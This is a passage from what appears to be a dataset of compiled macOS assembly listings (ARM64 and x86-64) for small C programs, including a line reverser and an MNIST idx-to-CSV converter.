fmov s3, s4
sshll.2d v3, v3, #0
; kill: def $d3 killed $d3 killed $q3
scvtf d3, d3
fmul d2, d2, d3
fmadd d0, d0, d1, d2
fcvtzs w0, d0
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function ft_get_light
LCPI0_0:
.quad 0x3ff0000000000000 ## double 1
.section __TEXT,__text,regular,pure_instructions
.globl _ft_get_light
.p2align 4, 0x90
_ft_get_light: ## @ft_get_light
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
movsd %xmm0, -16(%rbp)
movsd LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero
subsd -16(%rbp), %xmm0
cvtsi2sdl -4(%rbp), %xmm2
movsd -16(%rbp), %xmm1 ## xmm1 = mem[0],zero
cvtsi2sdl -8(%rbp), %xmm3
mulsd %xmm3, %xmm1
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
cvttsd2si %xmm0, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/122485.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _test_if3 ; -- Begin function test_if3
.p2align 2
_test_if3: ; @test_if3
.cfi_startproc
; %bb.0:
adrp x8, _test_if_x_condition3_1@GOTPAGE
ldr x8, [x8, _test_if_x_condition3_1@GOTPAGEOFF]
ldr w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_4
b LBB0_1
LBB0_1:
adrp x9, _test_if_x3_1@GOTPAGE
ldr x9, [x9, _test_if_x3_1@GOTPAGEOFF]
ldr w8, [x9]
add w8, w8, #1
str w8, [x9]
adrp x8, _test_if_x_condition3_2@GOTPAGE
ldr x8, [x8, _test_if_x_condition3_2@GOTPAGEOFF]
ldr w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2:
adrp x9, _test_if_x3_2@GOTPAGE
ldr x9, [x9, _test_if_x3_2@GOTPAGEOFF]
ldr w8, [x9]
subs w8, w8, #3
str w8, [x9]
b LBB0_3
LBB0_3:
b LBB0_4
LBB0_4:
ret
.cfi_endproc
; -- End function
.comm _test_if_x_condition3_1,4,2 ; @test_if_x_condition3_1
.comm _test_if_x3_1,4,2 ; @test_if_x3_1
.comm _test_if_x_condition3_2,4,2 ; @test_if_x_condition3_2
.comm _test_if_x3_2,4,2 ; @test_if_x3_2
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _test_if3 ## -- Begin function test_if3
.p2align 4, 0x90
_test_if3: ## @test_if3
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq _test_if_x_condition3_1@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
je LBB0_4
## %bb.1:
movq _test_if_x3_1@GOTPCREL(%rip), %rax
movl (%rax), %ecx
addl $1, %ecx
movq _test_if_x3_1@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq _test_if_x_condition3_2@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
je LBB0_3
## %bb.2:
movq _test_if_x3_2@GOTPCREL(%rip), %rax
movl (%rax), %ecx
subl $3, %ecx
movq _test_if_x3_2@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
LBB0_3:
jmp LBB0_4
LBB0_4:
popq %rbp
retq
.cfi_endproc
## -- End function
.comm _test_if_x_condition3_1,4,2 ## @test_if_x_condition3_1
.comm _test_if_x3_1,4,2 ## @test_if_x3_1
.comm _test_if_x_condition3_2,4,2 ## @test_if_x_condition3_2
.comm _test_if_x3_2,4,2 ## @test_if_x3_2
.subsections_via_symbols
| the_stack_data/110173.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
sub sp, sp, #2032
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str wzr, [sp, #20]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
add x0, sp, #1024
mov w1, #1000
bl _get_line
str w0, [sp, #16]
subs w8, w0, #0
cset w8, le
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
add x0, sp, #24
str x0, [sp, #8] ; 8-byte Folded Spill
add x1, sp, #1024
bl _rev_copy
ldr x8, [sp, #8] ; 8-byte Folded Reload
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
b LBB0_1
LBB0_3:
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_5
b LBB0_4
LBB0_4:
bl ___stack_chk_fail
LBB0_5:
mov w0, #0
add sp, sp, #2032
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #32 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.globl _get_line ; -- Begin function get_line
.p2align 2
_get_line: ; @get_line
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur w1, [x29, #-12]
str wzr, [sp, #12]
b LBB1_1
LBB1_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
ldur w9, [x29, #-12]
subs w9, w9, #1
subs w8, w8, w9
cset w8, ge
mov w9, #0
str w9, [sp, #8] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_4
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
bl _getchar
str w0, [sp, #16]
adds w8, w0, #1
cset w8, eq
mov w9, #0
str w9, [sp, #8] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_4
b LBB1_3
LBB1_3: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #16]
subs w8, w8, #10
cset w8, ne
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB1_4
LBB1_4: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #8] ; 4-byte Folded Reload
tbz w8, #0, LBB1_7
b LBB1_5
LBB1_5: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #16]
ldur x9, [x29, #-8]
ldrsw x10, [sp, #12]
strb w8, [x9, x10]
b LBB1_6
LBB1_6: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB1_1
LBB1_7:
ldr w8, [sp, #16]
subs w8, w8, #10
cset w8, ne
tbnz w8, #0, LBB1_9
b LBB1_8
LBB1_8:
ldr w8, [sp, #16]
ldur x9, [x29, #-8]
ldrsw x10, [sp, #12]
strb w8, [x9, x10]
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB1_9
LBB1_9:
ldur x8, [x29, #-8]
ldrsw x9, [sp, #12]
add x8, x8, x9
strb wzr, [x8]
ldr w0, [sp, #12]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _rev_copy ; -- Begin function rev_copy
.p2align 2
_rev_copy: ; @rev_copy
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
str x1, [sp, #16]
str wzr, [sp, #12]
str wzr, [sp, #8]
b LBB2_1
LBB2_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #16]
ldrsw x9, [sp, #8]
ldrsb w8, [x8, x9]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB2_3
b LBB2_2
LBB2_2: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB2_1
LBB2_3:
ldr w8, [sp, #8]
subs w8, w8, #2
str w8, [sp, #4]
ldr w8, [sp, #4]
str w8, [sp]
b LBB2_4
LBB2_4: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp]
subs w8, w8, #0
cset w8, lt
tbnz w8, #0, LBB2_7
b LBB2_5
LBB2_5: ; in Loop: Header=BB2_4 Depth=1
ldr x8, [sp, #16]
ldrsw x9, [sp]
add x8, x8, x9
ldrb w8, [x8]
ldr x9, [sp, #24]
ldr w10, [sp, #4]
ldr w11, [sp]
subs w10, w10, w11
add x9, x9, w10, sxtw
strb w8, [x9]
b LBB2_6
LBB2_6: ; in Loop: Header=BB2_4 Depth=1
ldr w8, [sp]
subs w8, w8, #1
str w8, [sp]
b LBB2_4
LBB2_7:
ldr x8, [sp, #24]
ldr w9, [sp, #4]
add w9, w9, #1
add x9, x8, w9, sxtw
mov w8, #10
strb w8, [x9]
ldr x8, [sp, #24]
ldr w9, [sp, #4]
add w9, w9, #2
add x8, x8, w9, sxtw
strb wzr, [x8]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%s"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $2032, %rsp ## imm = 0x7F0
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -2020(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
leaq -1008(%rbp), %rdi
movl $1000, %esi ## imm = 0x3E8
callq _get_line
movl %eax, -2024(%rbp)
cmpl $0, %eax
jle LBB0_3
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
leaq -2016(%rbp), %rdi
leaq -1008(%rbp), %rsi
callq _rev_copy
leaq -2016(%rbp), %rsi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_1
LBB0_3:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_5
## %bb.4:
xorl %eax, %eax
addq $2032, %rsp ## imm = 0x7F0
popq %rbp
retq
LBB0_5:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.globl _get_line ## -- Begin function get_line
.p2align 4, 0x90
_get_line: ## @get_line
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movl $0, -20(%rbp)
LBB1_1: ## =>This Inner Loop Header: Depth=1
movl -20(%rbp), %ecx
movl -12(%rbp), %edx
subl $1, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -21(%rbp) ## 1-byte Spill
jge LBB1_4
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
callq _getchar
movl %eax, %ecx
movl %ecx, -16(%rbp)
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $-1, %ecx
movb %al, -21(%rbp) ## 1-byte Spill
je LBB1_4
## %bb.3: ## in Loop: Header=BB1_1 Depth=1
cmpl $10, -16(%rbp)
setne %al
movb %al, -21(%rbp) ## 1-byte Spill
LBB1_4: ## in Loop: Header=BB1_1 Depth=1
movb -21(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB1_5
jmp LBB1_7
LBB1_5: ## in Loop: Header=BB1_1 Depth=1
movl -16(%rbp), %eax
movb %al, %dl
movq -8(%rbp), %rax
movslq -20(%rbp), %rcx
movb %dl, (%rax,%rcx)
## %bb.6: ## in Loop: Header=BB1_1 Depth=1
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB1_1
LBB1_7:
cmpl $10, -16(%rbp)
jne LBB1_9
## %bb.8:
movl -16(%rbp), %eax
movb %al, %dl
movq -8(%rbp), %rax
movslq -20(%rbp), %rcx
movb %dl, (%rax,%rcx)
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
LBB1_9:
movq -8(%rbp), %rax
movslq -20(%rbp), %rcx
movb $0, (%rax,%rcx)
movl -20(%rbp), %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _rev_copy ## -- Begin function rev_copy
.p2align 4, 0x90
_rev_copy: ## @rev_copy
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movl $0, -20(%rbp)
movl $0, -24(%rbp)
LBB2_1: ## =>This Inner Loop Header: Depth=1
movq -16(%rbp), %rax
movslq -24(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $0, %eax
je LBB2_3
## %bb.2: ## in Loop: Header=BB2_1 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB2_1
LBB2_3:
movl -24(%rbp), %eax
subl $2, %eax
movl %eax, -28(%rbp)
movl -28(%rbp), %eax
movl %eax, -32(%rbp)
LBB2_4: ## =>This Inner Loop Header: Depth=1
cmpl $0, -32(%rbp)
jl LBB2_7
## %bb.5: ## in Loop: Header=BB2_4 Depth=1
movq -16(%rbp), %rax
movslq -32(%rbp), %rcx
movb (%rax,%rcx), %dl
movq -8(%rbp), %rax
movl -28(%rbp), %ecx
subl -32(%rbp), %ecx
movslq %ecx, %rcx
movb %dl, (%rax,%rcx)
## %bb.6: ## in Loop: Header=BB2_4 Depth=1
movl -32(%rbp), %eax
addl $-1, %eax
movl %eax, -32(%rbp)
jmp LBB2_4
LBB2_7:
movq -8(%rbp), %rax
movl -28(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movb $10, (%rax,%rcx)
movq -8(%rbp), %rax
movl -28(%rbp), %ecx
addl $2, %ecx
movslq %ecx, %rcx
movb $0, (%rax,%rcx)
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%s"
.subsections_via_symbols
| the_stack_data/48576147.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
str w8, [sp, #8] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
adrp x2, l_.str.2@PAGE
add x2, x2, l_.str.2@PAGEOFF
bl _Process
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
adrp x1, l_.str.4@PAGE
add x1, x1, l_.str.4@PAGEOFF
adrp x2, l_.str.5@PAGE
add x2, x2, l_.str.5@PAGEOFF
bl _Process
ldr w0, [sp, #8] ; 4-byte Folded Reload
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function Process
_Process: ; @Process
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
sub sp, sp, #928
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
str x8, [sp, #48] ; 8-byte Folded Spill
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str x0, [sp, #120]
str x1, [sp, #112]
str x2, [sp, #104]
ldr x0, [sp, #120]
adrp x1, l_.str.6@PAGE
add x1, x1, l_.str.6@PAGEOFF
str x1, [sp, #56] ; 8-byte Folded Spill
bl _fopen
ldr x1, [sp, #56] ; 8-byte Folded Reload
str x0, [sp, #96]
ldr x0, [sp, #112]
bl _fopen
str x0, [sp, #88]
ldr x0, [sp, #104]
adrp x1, l_.str.7@PAGE
add x1, x1, l_.str.7@PAGEOFF
bl _fopen
str x0, [sp, #80]
ldr x11, [sp, #120]
ldr x10, [sp, #112]
ldr x8, [sp, #104]
mov x9, sp
str x11, [x9]
str x10, [x9, #8]
str x8, [x9, #16]
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
bl _printf
ldr x1, [sp, #80]
adrp x0, l_.str.9@PAGE
add x0, x0, l_.str.9@PAGEOFF
bl _fputs
str wzr, [sp, #68]
b LBB1_1
LBB1_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #68]
subs w8, w8, #784
cset w8, eq
tbnz w8, #0, LBB1_4
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
ldr x0, [sp, #80]
ldr w9, [sp, #68]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x1, l_.str.10@PAGE
add x1, x1, l_.str.10@PAGEOFF
bl _fprintf
b LBB1_3
LBB1_3: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #68]
add w8, w8, #1
str w8, [sp, #68]
b LBB1_1
LBB1_4:
ldr x1, [sp, #80]
adrp x0, l_.str.11@PAGE
add x0, x0, l_.str.11@PAGEOFF
bl _fputs
ldr x3, [sp, #96]
add x0, sp, #136
mov x1, #1
mov x2, #16
bl _fread
subs x8, x0, #16
cset w8, eq
tbnz w8, #0, LBB1_6
b LBB1_5
LBB1_5:
ldr x8, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.12@PAGE
add x1, x1, l_.str.12@PAGEOFF
bl _fprintf
b LBB1_27
LBB1_6:
ldr x3, [sp, #88]
add x0, sp, #128
mov x1, #1
mov x2, #8
bl _fread
subs x8, x0, #8
cset w8, eq
tbnz w8, #0, LBB1_8
b LBB1_7
LBB1_7:
ldr x8, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.13@PAGE
add x1, x1, l_.str.13@PAGEOFF
bl _fprintf
b LBB1_27
LBB1_8:
add x0, sp, #136
bl _ReadBigEndianInt32
subs w8, w0, #2051
cset w8, eq
tbnz w8, #0, LBB1_10
b LBB1_9
LBB1_9:
ldr x8, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.14@PAGE
add x1, x1, l_.str.14@PAGEOFF
bl _fprintf
b LBB1_27
LBB1_10:
add x0, sp, #128
bl _ReadBigEndianInt32
subs w8, w0, #2049
cset w8, eq
tbnz w8, #0, LBB1_12
b LBB1_11
LBB1_11:
ldr x8, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.15@PAGE
add x1, x1, l_.str.15@PAGEOFF
bl _fprintf
b LBB1_27
LBB1_12:
add x8, sp, #136
add x0, x8, #4
bl _ReadBigEndianInt32
str w0, [sp, #76]
ldr w8, [sp, #76]
str w8, [sp, #44] ; 4-byte Folded Spill
add x8, sp, #128
add x0, x8, #4
bl _ReadBigEndianInt32
ldr w8, [sp, #44] ; 4-byte Folded Reload
subs w8, w8, w0
cset w8, eq
tbnz w8, #0, LBB1_14
b LBB1_13
LBB1_13:
ldr x8, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.16@PAGE
add x1, x1, l_.str.16@PAGEOFF
bl _fprintf
b LBB1_27
LBB1_14:
ldr w9, [sp, #76]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.17@PAGE
add x0, x0, l_.str.17@PAGEOFF
bl _printf
add x8, sp, #136
str x8, [sp, #32] ; 8-byte Folded Spill
add x0, x8, #8
bl _ReadBigEndianInt32
ldr x8, [sp, #32] ; 8-byte Folded Reload
add x0, x8, #12
bl _ReadBigEndianInt32
str wzr, [sp, #72]
b LBB1_15
LBB1_15: ; =>This Loop Header: Depth=1
; Child Loop BB1_21 Depth 2
ldr w8, [sp, #76]
subs w9, w8, #1
str w9, [sp, #76]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_26
b LBB1_16
LBB1_16: ; in Loop: Header=BB1_15 Depth=1
ldr x3, [sp, #96]
add x0, sp, #136
mov x1, #1
mov x2, #784
bl _fread
subs x8, x0, #784
cset w8, eq
tbnz w8, #0, LBB1_18
b LBB1_17
LBB1_17:
ldr x8, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.18@PAGE
add x1, x1, l_.str.18@PAGEOFF
bl _fprintf
b LBB1_27
LBB1_18: ; in Loop: Header=BB1_15 Depth=1
ldr x3, [sp, #88]
add x0, sp, #128
mov x2, #1
mov x1, x2
bl _fread
subs x8, x0, #1
cset w8, eq
tbnz w8, #0, LBB1_20
b LBB1_19
LBB1_19:
ldr x8, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.19@PAGE
add x1, x1, l_.str.19@PAGEOFF
bl _fprintf
b LBB1_27
LBB1_20: ; in Loop: Header=BB1_15 Depth=1
ldr x0, [sp, #80]
ldr w9, [sp, #72]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x1, l_.str.20@PAGE
add x1, x1, l_.str.20@PAGEOFF
bl _fprintf
str wzr, [sp, #68]
b LBB1_21
LBB1_21: ; Parent Loop BB1_15 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #68]
subs w8, w8, #784
cset w8, eq
tbnz w8, #0, LBB1_24
b LBB1_22
LBB1_22: ; in Loop: Header=BB1_21 Depth=2
ldr x0, [sp, #80]
ldrsw x9, [sp, #68]
add x8, sp, #136
ldrb w10, [x8, x9]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x1, l_.str.21@PAGE
add x1, x1, l_.str.21@PAGEOFF
bl _fprintf
b LBB1_23
LBB1_23: ; in Loop: Header=BB1_21 Depth=2
ldr w8, [sp, #68]
add w8, w8, #1
str w8, [sp, #68]
b LBB1_21
LBB1_24: ; in Loop: Header=BB1_15 Depth=1
ldr x0, [sp, #80]
ldrb w10, [sp, #128]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x1, l_.str.22@PAGE
add x1, x1, l_.str.22@PAGEOFF
bl _fprintf
b LBB1_25
LBB1_25: ; in Loop: Header=BB1_15 Depth=1
ldr w8, [sp, #72]
add w8, w8, #1
str w8, [sp, #72]
b LBB1_15
LBB1_26:
b LBB1_27
LBB1_27:
ldr x0, [sp, #96]
bl _fclose
ldr x0, [sp, #88]
bl _fclose
ldr x0, [sp, #80]
bl _fclose
ldr x11, [sp, #120]
ldr x10, [sp, #112]
ldr x8, [sp, #104]
mov x9, sp
str x11, [x9]
str x10, [x9, #8]
str x8, [x9, #16]
adrp x0, l_.str.23@PAGE
add x0, x0, l_.str.23@PAGEOFF
bl _printf
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB1_29
b LBB1_28
LBB1_28:
bl ___stack_chk_fail
LBB1_29:
add sp, sp, #928
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #32 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function ReadBigEndianInt32
_ReadBigEndianInt32: ; @ReadBigEndianInt32
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
ldr x8, [sp, #8]
ldrb w9, [x8]
ldr x8, [sp, #8]
ldrb w8, [x8, #1]
lsl w8, w8, #16
orr w8, w8, w9, lsl #24
ldr x9, [sp, #8]
ldrb w9, [x9, #2]
orr w8, w8, w9, lsl #8
ldr x9, [sp, #8]
ldrb w9, [x9, #3]
orr w0, w8, w9
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "train-images.idx3-ubyte"
l_.str.1: ; @.str.1
.asciz "train-labels.idx1-ubyte"
l_.str.2: ; @.str.2
.asciz "train.csv"
l_.str.3: ; @.str.3
.asciz "t10k-images.idx3-ubyte"
l_.str.4: ; @.str.4
.asciz "t10k-labels.idx1-ubyte"
l_.str.5: ; @.str.5
.asciz "test.csv"
l_.str.6: ; @.str.6
.asciz "r"
l_.str.7: ; @.str.7
.asciz "w"
l_.str.8: ; @.str.8
.asciz "Opened %s and %s for reading and %s for writing.\n"
l_.str.9: ; @.str.9
.asciz "id"
l_.str.10: ; @.str.10
.asciz ",X%d"
l_.str.11: ; @.str.11
.asciz ",Y\n"
l_.str.12: ; @.str.12
.asciz "Could not read image file header.\n"
l_.str.13: ; @.str.13
.asciz "Could not read label file header.\n"
l_.str.14: ; @.str.14
.asciz "Unexpected magic number of image file.\n"
l_.str.15: ; @.str.15
.asciz "Unexpected magic number of label file.\n"
l_.str.16: ; @.str.16
.asciz "Numbers of images and labels don't match.\n"
l_.str.17: ; @.str.17
.asciz "Processing %d items...\n"
l_.str.18: ; @.str.18
.asciz "Could not read image."
l_.str.19: ; @.str.19
.asciz "Could not read label."
l_.str.20: ; @.str.20
.asciz "%d"
l_.str.21: ; @.str.21
.asciz ",%d"
l_.str.22: ; @.str.22
.asciz ",%d\n"
l_.str.23: ; @.str.23
.asciz "Closed %s, %s and %s.\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rdi
leaq L_.str.1(%rip), %rsi
leaq L_.str.2(%rip), %rdx
callq _Process
leaq L_.str.3(%rip), %rdi
leaq L_.str.4(%rip), %rsi
leaq L_.str.5(%rip), %rdx
callq _Process
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function Process
_Process: ## @Process
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $880, %rsp ## imm = 0x370
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -816(%rbp)
movq %rsi, -824(%rbp)
movq %rdx, -832(%rbp)
movq -816(%rbp), %rdi
leaq L_.str.6(%rip), %rsi
callq _fopen
movq %rax, -840(%rbp)
movq -824(%rbp), %rdi
leaq L_.str.6(%rip), %rsi
callq _fopen
movq %rax, -848(%rbp)
movq -832(%rbp), %rdi
leaq L_.str.7(%rip), %rsi
callq _fopen
movq %rax, -856(%rbp)
movq -816(%rbp), %rsi
movq -824(%rbp), %rdx
movq -832(%rbp), %rcx
leaq L_.str.8(%rip), %rdi
movb $0, %al
callq _printf
movq -856(%rbp), %rsi
leaq L_.str.9(%rip), %rdi
callq _fputs
movl $0, -868(%rbp)
LBB1_1: ## =>This Inner Loop Header: Depth=1
cmpl $784, -868(%rbp) ## imm = 0x310
je LBB1_4
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movq -856(%rbp), %rdi
movl -868(%rbp), %edx
leaq L_.str.10(%rip), %rsi
movb $0, %al
callq _fprintf
## %bb.3: ## in Loop: Header=BB1_1 Depth=1
movl -868(%rbp), %eax
addl $1, %eax
movl %eax, -868(%rbp)
jmp LBB1_1
LBB1_4:
movq -856(%rbp), %rsi
leaq L_.str.11(%rip), %rdi
callq _fputs
leaq -800(%rbp), %rdi
movq -840(%rbp), %rcx
movl $1, %esi
movl $16, %edx
callq _fread
cmpq $16, %rax
je LBB1_6
## %bb.5:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.12(%rip), %rsi
movb $0, %al
